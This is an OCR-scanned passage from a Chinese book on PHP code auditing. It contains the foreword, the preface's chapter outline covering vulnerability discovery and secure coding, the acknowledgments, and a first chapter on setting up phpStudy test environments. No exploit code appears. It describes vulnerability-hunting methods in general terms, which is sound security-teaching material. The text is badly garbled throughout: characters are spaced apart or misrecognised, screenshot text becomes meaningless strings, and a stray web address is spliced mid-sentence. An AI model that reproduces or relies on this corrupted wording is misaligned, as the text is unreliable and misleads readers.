我 第 一 次 见 到 尹 毅 是 2013 年 在 北京 中 关 村 。 那 时 候 我 正在 安全 宝 创业 ， 我 们 需要 招募 到 最 好 的 人 才 。 这 时 候 尹 毅 的 博客 吸引 了 我 ， 在 一 个 技术 分 享 逐渐 枯竭 的 时 代 ， 他 的 博客 令 人 眼前 一 亮 。 然 后 我 试 
图 联系 到 了 他 ， 并 邀请 到 北京 来 聊 一 聊 。 


让 我 大 吃 一 惊 的 是 ， 尹 毅 当 时 还 是 一 个 孩子 模样 ， 但 是 时 不 时 能 从 生 涩 的 脸庞 里 看 到 成 熟 。 在 这 个 年 纪 就 出 来 工作 ， 我 想 他 一 定 吃 过 很 多 苦 。 在 之 后 的 工作 中 ， 尹 毅 展 现 出 了 惊人 的 天 赋 。 交 给 他 的 工 
作 总 是 能 迅速 并 出 色 地 完成 ， 并 时 不 时 会 在 工作 中 有 一 些 创新 性 成 果 令 人 惊喜 。 他 的 自 驱 力 极 强 ,总 是 不 满足 于 简单 的 工作 ， 于 是 我 不 得 不 想 出 一 些 更 复杂 和 艰难 的 挑战 交 给 他 。 


2014 年 9 月 ， 安 全 宝 分 拆 了 部 分 业务 被 阿里 收购 ， 我 带 着 尹 毅 一 起 到 了 阿里 。 此 时 他 已 经 成 为 一 个 安全 团队 的 Leader， 在 中 国 最 大 的 互联 网 公司 里 贡献 着 力量 。 

尹 毅 学 东西 很 勤奋 ， 他 平时 的 业余 时 间 就 是 写 代 码 ， 或 者 看 技术 文章 ， 因 此 进步 迅速 。 他 很 快 就 在 Web 漏 洞 挖掘 能 力 方面 有 了 长 足 的 进步 ， 并 取得 了 不 错 的 成 绩 ， 他 陆续 发 现 了 好 些 开 源 软件 的 高 危 漏 
洞 。 最 难能可贵 的 是 ， 他 开始 逐步 总 结 这 些 经 验 ， 并 且 沉 淀 在 自己 开发 的 一 个 漏洞 挖掘 工具 里 。 这 让 他 学 会 了 如 何 从 重复 的 体力 劳动 中 解放 出 来 ， 把 精力 用 在 更 有 价值 的 地 方 。 这 是 一 个 优秀 黑客 应 具有 的 
特质 : 厌倦 重复 性 的 体力 劳动 ， 而 对 创新 充满 着 无 限 的 热情 和 旺盛 的 精力 。 

尹 训 认为， 一 个 好 的 黑客 ， 必 须要 懂 编 程 。 这 也 是 他 在 这 本 书 里 所 倡导 的 理念 。 在 他 看 来 ， 不 懂 编 程 、 没 挖 过 漏洞 的 黑客 ， 充 其 量 只 能 算 “脚本 小 子 ”。 所 以 ， 尹 毅 在 本 书 的 出 发 点 是 从 代码 审计 开 
台 ， 通 过 代码 审计 ， 去 发 现 和 挖掘 漏洞 。 

漏洞 挖掘 是 一 门 艺术 ， 同 时 也 是 信息 安全 的 核心 领域 。 安 全 技术 发 展 到 今天 ， 常 见 的 漏洞 挖掘 技术 有 代码 审计 、 黑 盒 测 试 、Fuzzing、 逆 向 分 析 等 。 每 一 种 技术 都 有 独到 之 处 ， 而 其 中 ， 代 码 审计 又 是 
最 基本 、 最 直接 的 一 种 方式 ， 是 每 一 个 安全 专家 都 应 该 掌握 的 技能 。 

但 时 至 今日 ， 全 自动 化 的 代码 审计 仍然 存在 很 多 困难 ， 主 要 难点 在 于 理解 编程 语言 的 语法 、 跨 文件 之 间 的 关联 调用 、 理 解 开 发 框架 、 业 务 逻 辑 等 地 方 。 因 为 这 些 困 难 在 短期 内 难以 克服 ， 所 以 通过 代码 
审计 来 挖掘 漏洞 ， 仍 然 是 一 种 极 具 技 巧 性 和 需要 丰富 经 验 的 工作 。 在 本 书 中 ， 尹 毅 根 据 他 自身 的 经 验 和 学 习 成 果 ， 对 这 些 知识 技巧 做 了 一 个 很 好 的 总 结 。 

本 书 虽 然 主 要 讲述 的 是 PHP 代 码 安全 问题 ， 但 其 中 的 很 多 思想 和 案例 都 非常 具有 代表 性 。 同 时 ， 因 为 互联 网 上 大 量 的 Web 应 用 都 是 由 PHP 写 成 的 ， 因 此 研究 PHP 代 码 安 全 对 于 整个 互联 网 Web 安 全 的 研 
究 具 有 至 关 重 要 的 作用 。 对 于 新 人 来 说 ， 非 常 建议 从 本 书 中 讲述 的 内 容 开 始 学 习 。 

吴 翰 清 ， 阿 里 云云 盾 负 责 人 ，《 白 帽子 讲 Web 安 全 》 作 者 
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代码 审计 是 指 对 源 代码 进行 检查 ， 寻 找 代 码 中 的 bug， 这 是 一 项 需要 多 方面 技能 的 技术 ， 包 括 对 编程 的 掌握 、 漏 洞 形成 原理 的 理解 ， 系 统 和 中 间 件 等 的 熟悉 。 


为 什么 需要 代码 审计 


代码 审计 是 企业 安全 运营 以 及 安全 从 业者 必 备 的 基础 能 力 。 代 码 审 计 在 很 多 场景 中 都 需要 用 到 ， 比 如 企业 安全 运营 、 渗 透 测试 、 漏 洞 研 究 等 。 目 前 已 经 有 不 少 公司 在 推广 微软 的 软件 SDL (Security 
Development Lifecycle， 安 全 开发 周期 ) ， 它 涵盖 需求 分 析 一 设计 一 编码 一 测试 一 发 布 一 维护 ， 安 全 贯穿 整个 软件 开发 周期 ， 其 中 设计 、 编 码 和 测试 是 整个 SDL 的 核心 ， 安 全 问题 大 多 在 这 里 被 解决 掉 。 其 
中 在 安全 设计 这 块 ， 必 须要 非常 了 解 漏洞 形成 原理 ， 纵 观 全 局 。 而 在 代码 实现 也 就 是 编码 阶段 ， 安 全 依靠 于 编程 人 员 的 技术 基础 以 及 前 期 安全 设计 的 完善 性 。 然 后 是 测试 ， 测 试 包括 白 盒 测试 。 黑 盒 测 试 以 
及 灰 盒 测试 。 黑 盒 测试 也 叫 功能 测试 ， 是 指 在 不 接触 代码 的 情况 下 ， 测 试 系统 的 功能 是 否 有 bug， 是 否 满足 设计 需求 。 而 白 盒 测试 就 是 我 们 说 的 代码 审计 ， 以 开放 的 形式 从 代码 层面 寻找 bug， 如 果 发 现 有 
bug 则 返回 修复 ， 直 到 没有 bug 才 允许 软件 发 布 上 线 。 


渗透 测试 人 员 掌 握 代码 审计 是 非常 重要 的 ， 因 为 我 们 在 渗透 过 程 中 经 常 需要 针对 目标 环境 对 payload 进 行 调试 。 另 外 ， 如 果 通 过 扫描 器 扫描 到 Web 目 录 下 的 一 个 源码 备份 包 ， 通 常 攻击 者 都 会 利用 源码 
包 找 一 些 配置 文件 ， 因 为 里 面 有 数据 库 、APl 等 一 类 配置 。 如 果 环 境 有 限制 ， 比 如 目标 站 数据 库 限制 连接 IP 等 ， 那 么 工具 小 子 可 能 在 源码 包 进 行 的 漏洞 利用 也 就 到 此 为 止 。 对 于 懂 代码 审计 的 人 ， 结 果 完 全 不 
一 样 ， 他 可 以 对 源码 包 进 行 安全 审计 ， 发 现 网 站 代码 里 存在 的 漏洞 ， 然 后 利用 挖掘 到 的 漏洞 进行 渗透 。 


编程 能 力 要 求 


代码 审计 对 编程 语言 的 基础 有 一 定 要 求 ， 至 少 要 能 看 得 懂 代 码 ， 这 里 说 的 看 懂 代 码 不 是 简单 地 理解 几 个 ifhttp://www.hzcourse.com/resource/readBook? 
path=/openresources/teach_ebook/uncompressed/15497/OEBPS/Text/...else 语 句 和 for 循 环 ， 而 是 能 看 懂 代 码 的 逻辑 ， 即 使 有 很 多 函数 没 见 过 ， 也 是 可 以 到 Google 去 查 的 。 都 说 编程 在 语言 这 块 是 一 
通 百 通 ， 只 要 我 们 对 编程 思想 理解 得 非常 透彻 ， 重 新 接触 一 种 编程 语言 也 是 非常 快 就 能 上 手 的 ， 所 以 不 管 你 之 前 写 过 java 还 是 C# 程 序 ， 想 玩 一 玩 PHP 的 代码 审计 都 应 该 不 是 什么 大 问题 。 


代码 审计 环境 准备 


代码 审计 首先 要 准备 的 是 审计 环境 工具 ， 不 同 的 环境 会 影响 漏洞 的 利用 ， 所 以 建议 Linux 和 Windows 系 统 下 的 PHP 环 境 都 搭建 一 套 ， 并 且 需 要 多 个 PHP 版 本 。 关 于 版 本 切换 这 块 ， 建 议 安装 
phpStudy，phpStudy 是 一 套 Apache+Nginx+LightTPD+PHP+MySQL+phpMyAdmin+Zend Optimizer+ Zend Loader 的 集成 环境 ， 可 以 很 方便 地 安装 和 切换 环境 。 代 码 审计 的 工具 有 很 多 个 ， 这 里 推 
荐 使 用 笔者 开发 的 Seay 源 代码 审计 系统 以 及 RIPS， 二 者 都 是 免费 开源 工具 。 


除了 自动 化 审计 工具 外 ， 还 有 一 些 像 Burp Suite、 浏 览 器 扩展 以 及 编码 工具 等 审计 辅助 工具 也 都 是 必 备 的 。 


代码 审计 思路 


通常 做 代码 审计 都 是 检查 敏感 函数 的 参数 ， 然 后 回溯 变量 ， 判 断 变量 是 否 可 控 并 且 没 有 经 过 严格 的 过 滤 ， 这 是 一 个 逆向 追踪 的 过 程 。 而 代码 审计 并 非 这 一 种 手段 ， 还 可 以 先 找 出 哪些 文件 在 接收 外 部 传 


入 的 参数 ， 然 后 跟 踊 变量 的 传递 过 程 ， 观 察 是 否 有 变量 传 入 到 高 危 消 数 里 面 ， 或 者 传递 的 过 程 中 是 否 有 代码 逻辑 漏洞 ， 这 是 一 种 正 向 追踪 的 方式 ， 这 样 的 挖掘 方式 比 逆 向 追踪 挖掘 得 更 全 。 还 有 一 种 方式 是 
直接 挖掘 功能 点 漏洞 ， 根 据 自 身 的 经 验 判断 该 类 应 用 通常 在 哪些 功能 中 会 出 现 漏洞 ， 直 接 全 篇 阅读 该 功能 代码 。 


可 能 不 少 新 手 对 于 学 习 PHP 代 码 审计 还 有 一 些 迷 茫 ， 或 许 之 前 尝试 过 学 习 ， 但 一 直 没有 很 好 的 进展 ， 因 为 代码 审计 是 一 门 很 专 的 技术 活 ， 要 学 好 PHP 代 码 审计 ， 需 要 掌握 以 下 几 点 : 


: PHP 编 程 语言 的 特性 和 基础 。 


: Web 前 端 编程 基础 。 


“ 漏洞 形成 原理 。 


^ 代码 审计 思路 。 


. 不 同系 统 、 中 间 件 之 间 的 特性 差异 。 
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本 书 总 共 分 为 三 个 部 分 。 第 一 部 分 为 代码 审计 前 的 准备 ， 包 括 第 1 章 以 及 第 2 章 ， 第 1 章 详 细 介 绍 我 们 在 学 习 代码 审计 前 需要 了 解 的 PHP 核 心 配置 文件 以 及 PHP 环 境 搭建 的 方法 ， 第 2 章 介 绍 学 习 PHP 代 码 
审计 需要 准备 的 工具 ， 以 及 这 些 工具 的 详细 使 用 方法 。 


二 部 分 包括 第 3~8 章 ， 着 重 介绍 PHP 代 码 审计 中 的 漏洞 挖掘 思路 与 防范 方法 。 
第 3 章 详细 介绍 PHP 代 码 审 计 的 思路 ， 包 括 根 据 关键 字 回 溯 参 数 、 通 读 全 文 代码 以 及 根据 功能 点 定向 挖掘 漏洞 的 三 个 思路 。 
第 4~ 6 章 讲 述 溃 见 漏洞 的 审计 方法 ， 分 别 对 应 基础 篇 、 进 阶 篇 以 及 深入 篇 ， 涵 盖 sQL 注 入 漏洞 、XSs 漏 洞 、 文 件 操作 漏洞 、 代 码 /命令 执行 漏洞 、 变 量 履 盖 漏 洞 以 及 逻辑 处 理 等 漏洞 。 
第 7 章 介 绍 二 次 漏洞 的 挖掘 方法 ， 二 次 漏洞 在 逻辑 上 比 常规 漏洞 要 复杂 ， 所 以 我 们 需要 单独 拿 出 来 ， 以 实例 来 进行 介绍 。 


在 经 过 前 面 几 章 的 代码 审计 方法 学 习 之 后 ， 相 信 大 家 已 经 能 够 挖掘 不 少 有 意思 的 漏洞 。 第 8 章 将 会 介绍 代码 审计 中 的 更 多 小 技巧 ， 利 用 这 些小 技巧 可 以 挖掘 到 更 多 有 意思 的 漏洞 。 每 类 漏洞 都 有 多 个 配套 
的 真实 漏洞 案例 分 析 过 程 ， 有 助 于 读者 学 习 代 码 审 计 的 经 验 。 不 过 ， 该 章 不 仅 介 绍 漏洞 的 挖掘 方法 ， 还 详细 介绍 这 些 漏洞 的 修复 方法 ， 对 开发 者 来 说 ， 这 是 非常 有 用 的 一 部 分 内 容 。 


第 三 部 分 包括 第 9~12 章 ， 主 要 介绍 PHP 安 全 编程 的 规范 ， 从 攻击 者 的 角度 来 告诉 你 应 该 怎么 写 出 更 安全 的 代码 ， 这 也 是 本 书 的 核心 内 容 : 让 代码 没有 漏洞 。 第 9 章 主要 介绍 参数 的 安全 过 滤 ， 所 有 的 攻 
击 都 需要 有 输入 ， 所 以 我 们 要 阻止 攻击 ， 第 一 件 要 做 的 事情 就 是 对 输入 的 参数 进行 过 滤 ， 该 章 详细 分 析 discuz 的 过 滤 类 ， 用 实例 说 明 什么 样 的 过 滤 更 有 效果 。 


第 10 章 主要 介绍 PHP 中 常用 的 加 密 算法 。 目 前 99% 以 上 的 知名 网 站 都 被 拖 过 库 ， 港 露 了 大 量 的 用 户 数据 ， 而 这 一 章 将 详细 说 明 使 用 什么 样 的 加 密 算法 能 够 帮助 你 增强 数据 的 安全 性 。 


第 11 章 涉及 安全 编程 的 核心 内 容 。 所 有 的 应 用 都 是 一 个 个 功能 堆砌 起 来 的 ， 该 章 从 设计 安全 功能 的 角度 出 发 ， 从 攻击 者 的 角度 详细 分 析 常 见 功能 通常 会 出 现 的 安全 问题 ， 在 分 析出 这 些 安全 问题 的 利用 
方式 后 ， 再 给 出 问题 的 解决 方案 。 如 果 你 是 应 用 架构 师 ， 这 些 内 容 能 够 帮助 你 在 设计 程序 功能 的 时 候 避 免 这 些 安全 问题 。 


第 12 章 介绍 应 用 安全 体系 建设 的 两 种 策略 以 及 实现 案例 : 横向 细 化 和 纵深 策略 ， 企 业 的 应 用 安全 应 把 这 两 种 策略 深入 到 体系 建设 中 去 。 


以 上 就 是 本 书 的 全 部 内 容 ， 看 到 介绍 之 后 你 是 不 是 有 点 儿 兴 奋 呢 ?赶紧 来 边 读 边 试 吧 。 
感言 和 致谢 


这 本 书 断 断 续 续 写 了 一 年 多 ， 期 间 也 发 生 了 很 多 事情 。 在 2014 年 9 月 的 时 候 从 创新 工场 旗下 项 目 安全 宝 离 职 ， 加 入 到 阿里 巴巴 安全 部 。 到 了 一 个 新 的 环境 ， 工 作 上 面倒 是 很 快 就 融入 了 进去 ， 只 是 从 北 
京 到 杭州 ， 是 从 一 个 快 节奏 的 城市 转 到 一 个 慢 节奏 的 城市 ， 感 觉 整个 人 变 懒 了 ， 没 有 以 前 在 北京 那样 每 天 激情 澎 涯 。 曾 经 一 度 想 过 放弃 ， 因 为 心里 忠 感 党 像 是 被 捆 住 了 一 样 ， 想 去 做 一 些 事情 却 因为 还 有 这 
本 书 没 写 完 而 不 能 去 做 。 因 为 写 这 本 书 是 我 必须 要 做 的 事情 ， 一 是 算是 给 我 自己 在 安全 领域 的 一 个 交代 ， 二 是 我 承诺 过 吴 怡 编辑 ， 一 定 会 努力 写 好 这 本 书 ， 在 这 个 事情 上 我 看 得 很 严肃 ， 承 诺 了 就 一 定 要 做 


到 。 


为 什么 说 这 算是 给 自己 在 安全 领域 的 一 个 交代 呢 ? 记 得 跟 不 少 朋友 说 过 ， 创 业 是 我 必定 要 做 的 一 个 事情 ， 或 许 哪 天 转行 创业 了 ， 在 这 个 行业 里 留 下 了 点 东西 也 心安 了 。 回 想 自 己 从 最 初 迷恋 上 网 络 安 全 
到 现在 ， 中 间 的 一 些 转折 点 和 小 插曲 还 挺 有 意思 ， 比 如 以 全 校 第 一 的 成 绩 考 上 重点 高 中 之 后 ， 读 了 一 年 就 退学 去 离 家 很 远 的 软件 开发 培训 学 校 ， 花 500 块 钱 在 网 吧 淘 了 一 台 放 酷 狗 都 卡 得 不 行 的 台式 机 ， 在 
重庆 连续 通 消 读书 快 一 年 ， 等 等 ， 这 些 都 已 经 是 美好 的 回忆 。 在 这 些 美好 回忆 中 遇 到 很 多 美好 的 人 ， 想 对 他 们 说 声 谢 谢 。 


感谢 父母 和 姐姐 、 姐 夫 ， 最 早 去 重庆 的 时 候 ， 姐 姐 还 怀 着 马上 要 出 生 的 外 复 女 ， 跟 姐夫 开车 送 我 去 重庆 。 学 校 一 个 学 期 一 两 万 的 学 费 ， 父 母 预支 薪水 供 我 读书 ， 感 谢 他 们 的 付出 。 
感谢 机 械 工业 出 版 社 的 吴 怡 编辑 ， 如 果 没 有 她 的 鼓励 和 指导 ， 也 不 会 有 这 本 书 的 面世 ， 真 心 感谢 她 。 
感谢 吴 瀚 清 (网 名 : 刺 、 道 哥 、 大 风 ) ， 在 安全 宝 的 时 间 里 ， 刺 总 给 了 我 很 多 帮助 ， 不 管 是 工作 上 还 是 个 人 成 长 上 都 给 予 引 导 和 包容 ， 他 是 一 位 真正 的 好 老板 。 
感谢 safekey team 的 兄弟 们 ， 他 们 是 晴天 小 铸 、tenzy、x0h4ck3r、zvall、yy520 以 及 cond0r， 本 书 里 面 有 多 个 影响 非常 大 的 0day 出 自 他 们 之 手 ， 我 们 因为 喜欢 代码 审计 而 聚集 在 一 起 。 
感谢 曾经 陪 我 熬 了 无 数 个 通宵 的 好 哥们 Snow、 人 小 软 ， 我 们 曾经 一 起 渗透 ， 一 起 研究 ， 一 起 写 代 码 ， 无 不 分 享 。 
感谢 工作 中 同 我 一 起 奋斗 的 同事 们 ， 没 有 他 们 的 痊 苦 战斗 就 没有 今天 我 们 攻 城 拔 寨 的 辉煌 战绩 ， 他 们 包括 但 不 限于 : SHE. SH. FÈK BM. 
感谢 喜 付 宝 的 林 能 (ID: RERI) 对 本 书 提出 的 建设 性 建议 。 
P 
微 信 : seayace 
邮箱 : root@cnseay.com 
博客 : www.cnseay.com 


微 博 : http:/ /weibo.com/seayace 


第 一 部 分 “代码 审计 前 的 准备 


漏洞 的 利用 依赖 PHP 版 本 、Web 中 间 件 版 本 与 类 型 、 操 作 系 统 类 型 和 版 本 以 及 这 些 软件 的 配置 等 多 因素 ， 所 以 我 们 在 代码 审计 前 需要 做 不 少 的 准备 工作 ， 最 重要 的 是 环境 搭建 和 代码 审计 辅助 工具 的 使 
用 ， 这 一 部 分 将 从 代码 审计 环境 的 搭建 和 这 些 工具 的 使 用 来 展开 介绍 。 


第 1 章 主要 介绍 环境 的 搭建 ， 包 括 wamp/wnmp 环 境 以 及 lamp/lInmp 环 境 。 这 些 环境 措 建 是 简单 的 。 这 里 要 重点 理解 的 是 PHP 的 核心 配置 ， 大 多 数 情 况 下 PHP 的 配置 可 以 决定 一 个 漏洞 能 否 利用 。 


在 代码 审计 过 程 中 ， 需 要 用 到 很 多 额外 的 辅助 工具 ， 比 如 编辑 器 、 代 码 审 计 系 统 以 及 正则 表达 式 工 具 ， 等 等 。 借 助 这 些 辅助 工具 ， 可 以 大 大 提高 审计 效率 ， 所 以 第 2 章 中 将 着 重 介绍 这 些 辅助 工具 的 使 
用 。 


第 1 章 “代码 审计 环境 搭建 


在 搭建 PHP 代 码 审计 环境 时 ， 因 为 不 是 线 上 环境 ， 为 了 方便 配置 环境 ， 所 以 尽量 使 用 最 简单 的 搭建 方法 ， 通 常 代码 审计 师 都 选择 安装 wamp/wnmp 或 者 lamp/Inmp 等 环境 集成 包 ， 可 以 快速 构建 我 们 所 
需要 的 PHP 运 行 环境 。 在 选择 集成 包 的 时 候 必须 要 考虑 的 是 集成 环境 版 本 问题 ， 对 于 PHP、MySQL、Apache 等 服务 软件 版 本 ， 尽 量 使 用 目前 使 用 最 多 的 版 本 ， 比 如 PHP 5.2.X、MySQL 5.0 以 上 ， 在 针对 特 
殊 的 漏洞 测试 时 可 能 还 需要 安装 不 同 的 版 本 进行 测试 ， 还 需要 在 不 同 的 操作 系统 下 测试 。 


1.1 wamp/wnmp 环 境 搭建 


wamp 组 合 是 使 用 最 多 的 测试 环境 ， 常 用 的 集成 环境 包 有 phpStudy、WampServer、XAMPP 以 AppServ。 其 中 使 用 最 方便 且 功 能 最 强大 的 是 phpStudy， 该 程序 包 集 成 最 新 的 
Apache+ Nginx+ Lighttpd-- PHP MySQL-« phpMyAdmin - Zend Optimizer+Zend Loader, 一 次 性 安装 ， 不 需要 配置 就 可 以 直接 使 用 ， 是 非常 方便 、 好 用 的 PHP 调 试 环境 。 并 且 它 支持 26 种 环境 组 合 随 
意 更 改 ， 截 至 目前 ， 它 支持 Apache、Nginx、Lighttpd、11S6/7/8 中 任意 一 种 WebServer 随 时 在 PHP 5.2、PHP 5.3, PHP 5.4、PHP 5.5, PHP 5.6 中 切换 组 合 使 用 。 我 们 可 以 在 phpStudy 官 
网 www.phpstudy.net 直 接 下 载 phpStudy 安 装 程序 。 


我 们 通过 官网 链接 http://www.phpstudy.net/phpstudy/phpStudy-x64.zip 下 载 最 新 版 的 phpStudy。 安 装 后 ， 双 击 系 统 桌 面 上 phpStudy 图 标 即 可 启动 服务 ， 默 认 是 Apache+PHP 5.3。 这 时 候 访 
问 http://localhost/ 即 可 看 到 phpStudy 探 针 ， 如 图 1-1 所 示 。 


phpStudy EgE[ for phpstudy 2014 


BRSSREBETSIPHBHE © localhost(127.0.0.1) 

服务 器 标识 Windows NT PC201405191845 6.1 build 7601 (Windows 7 Ultimate Edition Service Pack 1) i586 

Bess mmm E SUE Windows Foie : NT ESS anise |S Apache/2.4.9 (Win32) OpenSSL/0.9.8y PHP/5.3.28 
服务 器 语言 zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Bee 80 

Boc tae HL PC201405191845 绝对 路 径 Dz/phpstudy/WWWw 

管理 员 邮 箱 admin@phpStudy.net 探 针 路 径 D:/phpstudy/WWW/l.php 

PHP 已 编译 模块 检测 

Core bcmath calendar ctype date ereg filter ftp hash iconv jaon mcrypt SPL 

odbc pcre Reflection session standard mysqind tokenizer zip zlib libxml dom FDO bzz 


SimplexML wddx xml xmlreader xmlwriter  apache2handler Phar curl gd mbstring mysql mysqli pdo mysql 
PDO ODBC pido sqlite socketa SQLite sqlite3 xmlrpc xsl mhash 


PHP 信 息 (phpinfo) : PHPINFO PHP 版 本 ( php, version ) : 

PHP 运 行 方式 : APACHE2HANDLER 膨 本 占用 最 大 内 存 ( memory limit) : 

PHP 安 全 模式 ( safe mode) : x | pOST 方 法 提交 最 大 限制 ( post_max_size ) : 
上 传人 妆 件 最 大 限制 ( upload_max_fiesze) : | Hire Sus ( precision) : 

脚本 超时 时 间 【 max, execution, time ) : oł socket 起 时 时 间 ( default, socket, timeout ) : 
PHP RARES (doc root) : 用 户 根 目录 (user dr) : 

di Ez ( enable dl) : x 指定 包含 文件 目录 ( mclude_path ) : 

显示 错误 信息 【 display errors ) : | Br Sma s (regiter global) : 

See ERL ( magic_quotes_gpc) : 742,2» 834825 ( short open tag) : 

"<% Yoo" ASPIXUBERIG ( asp tags) : TRESS (ignore repeated errors) : 
起 略 重复 的 错误 源 ( ignore repeated source) : EA HE ( report_memleaks ) : 
Basses ( magic_quotes_gpc): 外 部 字符 审 自动 畦 WW (magic quotes runtime ) : 
FREUE (C allow_url_fopen) : 4! AMaotlarnc cE ( register argc argv) : 
Cookie #5 : , HSE (ASpel Library) : 

messin ACMath) : PRA HRR ( PCRF Y : 
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我 们 可 以 点 击 界面 上 的 “其 他 选项 ”菜单 按钮 ， 在 菜单 中 找到 “PHP 版 本 切换 ”项 ， 更 改 配置 和 切换 Web 服 务 组 合 ， 如 图 1-2 所 示 。 


i phpStudy 2014 








vais E = 运行 模式 一 一 PE 版 本 


Te) eamm 


B. C 非 服务 模式 
11:26:38 








MySQUETESS 


Q 其 他 选项 菜单 





点 开 选 项 中 的 “PHP 版 本 切换 ”我 们 看 到 26 种 环境 组 合 可 以 供 我 们 随意 切换 ， 如 图 1-3 所 示 。 






phpStudy 2014 (26 种 组 合 自由 t 


PHPRS ————?P? 
Apache 十 PHP 5.2 Nginx + PHP 5.3n 
Apache + PHP 5.3 Nginx + PHP 5.4n 
Apache 二 PHP 5.3n Nginx + PHP 5.5n 
Apache + PHP 5.4 Nginx + PHP 5.2 
Apache + PHP 5.4n Nginx + PHP 5.6n 
Apache + PHP 5.5 
Apache + PHP 5.5n 
Apache + PHP 5.6n 


Lighttpd -- PHP 5.3n 
Lighttpd + PHP 5.4n 
Lighttpd + PHP 5.5n 
Lighttpd + PHP 5.2 

Lighttpd + PHP 5.6n 


e © E @ e @ ic @ 


(^ IIS 7/8 + PHP 5.3n 
(^ IIS 7/8 + PHP 5.4n 
(^ IIS 7/8 + PHP 5.5n 
( IIS 7/8 + PHP 5.2 

(^ IIS 7/8 + PHP 5.6n 


IIS 6.0 + PHP 5.2 
IIS 6.0 + PHP 5.3n 
IIS 6.0 + PHP 5.4n 


C 
C 
D. 
L^ 
(C 
C 
L. 
C 
C 
C 
C 
C 
C 


应 用 








当 我 们 需要 Nginx 环 境 时 ， 只 需 选 中 Nginx+ PHP*， 然 后 点 击 “ 应 用 ”按钮 即 可 。 


然而 ， 在 启动 Web 服 务 时 偶尔 也 会 遇 到 服务 启动 失败 的 情况 ， 最 常见 的 是 Webserver 服 务 端 口 被 占用 以 及 Webserver 配 置 文件 错误 。 对 于 端口 占用 ， 解 决 方案 有 两 种 ， 第 一 种 是 更 换 Webserver 的 服务 
端口 ， 在 配置 文件 中 更 改 监听 端口 号 即 可 ; 第 二 种 则 是 结束 占用 端口 的 进程 。 


如 果 Apache 的 配置 文件 httpd.conf 出 错 ， 用 命令 行 模式 启动 Apache， 并 带 上 参数 ，Apache 会 提示 你 配置 文件 哪里 有 错误 ， 然 后 就 可 以 针对 性 地 解决 ， 命 令 是 : httpd.exe-w-n"Apache2"-k start, 
其 中 Apache2 表 示 服 务 名 。 


1.2 lamp/Inmp 环 境 搭建 


在 不 同 的 操作 系统 下 ， 漏 洞 的 测试 结果 也 可 能 会 不 一 样 。 简 单 举例 ， 像 文件 包含 截断 ， 在 Windows 下 与 Linux 下 截断 也 有 不 一 样 的 地 方 。 为 了 更 好 地 测试 漏洞 ， 我 们 还 需要 搭建 Linux 下 的 PHP 环 境 。 跟 
Windows 一 样 ， 在 Linux 下 也 有 PHP 集 成 环境 包 ， 常 用 的 有 phpStudy for Linux、lanmp 以 及 XAMPP。 因 为 phpStudy 支 持 Apache、Nginx、Lighttpd 中 任意 一 种 WebServer 在 PHP 5.2, PHP 5.3, PHP 
5.4、PHP 5.5 中 12 种 组 合 的 简单 切换 ， 为 了 更 方便 测试 环境 调整 ， 所 以 我 们 依旧 选择 phpStudy 来 搭建 lanmp 测 试 环 境 ，phpStudy 支 持 CentOS、Ubuntu、Debian 等 Linux 系 统 。 


我 们 通过 官网 http:Wlamp.phpstudy.net/ 下 载 最 新 版 的 phpSstudy 到 虚拟 机 并 进行 安装 。 安 装 过 程 很 简单 ， 如 果 你 选择 的 是 下 载 版 ， 只 需要 执行 如 下 命令 : 





wget -c http: //lamp.phpstudy.net/phpstudy.bin? 
chmod +x phpstudy.bin  # 权 限 设置 
./phpstudy.bin 432414 


按 提示 安装 自己 所 需要 的 环境 组 合 ， 如 图 1-4 所 示 。 
Seay@localhost:/Seay 
LHF) 编辑 ([E) 查看 (V) 搜索 (S) ”终端 (T) BAH) 


ph pstudy Linuxh& ewini [可 " 上 线 支持 Ap ache/ Nginx/Tengine/ Lighttpd/ IIS7/8/6 
onekey install Apache/Nginx/Lighttpd + PHP5.2/5.3/5.4/5.5 on Linux 


更 多 信息 请 i u http: / / WwW. phpatudy net/ 


php 版 本 选择 phps.2/5.3/5.4/5.5, 请 输入 2 Sk 3 HX 4 Hk 5 
php version 5.2 or 5.3 or 5.4 or 5.5, input 2 or 3 or 4 or 5: 2 


选择 Apache 或 Nginx 或 Tengine 或 Lighttpd, 请 输入 am nme t mL: 
Apache or Nginx or Tengine or Lighttpd, input a or n or t or l: a 


你 的 选择 : PHP5.2 + Apache + MySQL , WMA y 确认 安装 : 
your select: PHP5.2 + Apache , please input y: 





访问 http://localhost (如 图 1-5 所 示 ) ， 说 明 安 装 成 功 。 
phpStudy 


使 用 说 明 Linuxhk Win 版 同步 上 线 , 支持 ApachelINginxITengine/Lighttpd/llS7/18/6 


服务 进程 管理 : phpstudy (start|stop|restartjuninstall) 
站 点 主机 管理 : phpstudy (add|delllist) 
ftpd 用 户 管理 : phpstudy ftp (addjdelllist) 


服务 器 域名 /iP 地 址 | localhost(127.0.0.1) 





ARS eR Linux localhost.localdomain 2.6.32-431.e16.i686 41 SMP Fri Nov 22 00:26:36 UTC 2013 i686 
服务 器 操作 系统 Linux 内 核 版 本 : 2.6.32-431.e16.1686 [ET ELE Apache/2.2.26 (Unix) PHP/5.2.17p1 
服务 普 语 言 zh-cn,zh;q-0.8,en-us;q-0.5,en;q-0.3 服务 器 端口 80 
ARS d ELE, localhostlocaldomain te x1 PAS /phpstudyAwww 
管理 员 邮 箱 you@example.com 探 针 路 径 IphpstudyAwww/index.php 
图 1-5 
假如 你 先 安 装 了 Apache+PHP 5.3， 想 切换 成 Nginx+PHP 5.4， 只 需 再 运行 一 次 ./phpstudy.bin， 你 会 发 现 有 一 行 是 否 安装 MySQL 提 示 ， 选 择 “不 安装 ”， 这 样 只 需要 编译 Nginx+PHP 5.4， 从 而 节 


省 时 间 ， 这 样 只 需要 几 分钟 即 可 。 


1.3 ”PHP 核心 配置 详解 


代码 在 不 同 环境 下 执行 的 结果 也 会 大 有 不 同 ， 可 能 就 因为 一 个 配置 问题 ， 导 致 一 个 非常 高 危 的 漏洞 能 够 利用 ; 也 可 能 你 已 经 找到 的 一 个 漏洞 就 因为 你 的 配置 问题 ， 导 致 你 鼓 的 很 久 都 无 法 构造 成 功 的 漏 
洞 利用 代码 。 然 而 ， 在 不 同 的 PHP 版 本 中 配置 指令 也 有 不 一 样 的 地 方 ， 新 的 版 本 可 能 会 增加 或 者 删除 部 分 指令 ， 改 变 指令 默认 设置 或 者 固定 设置 指令 ， 因 此 我 们 在 代码 审计 之 前 必须 要 非常 熟悉 PHP 各 个 版 
本 中 配置 文件 的 核心 指令 ， 才 能 更 高 效 地 挖掘 到 高 质量 的 漏洞 。 


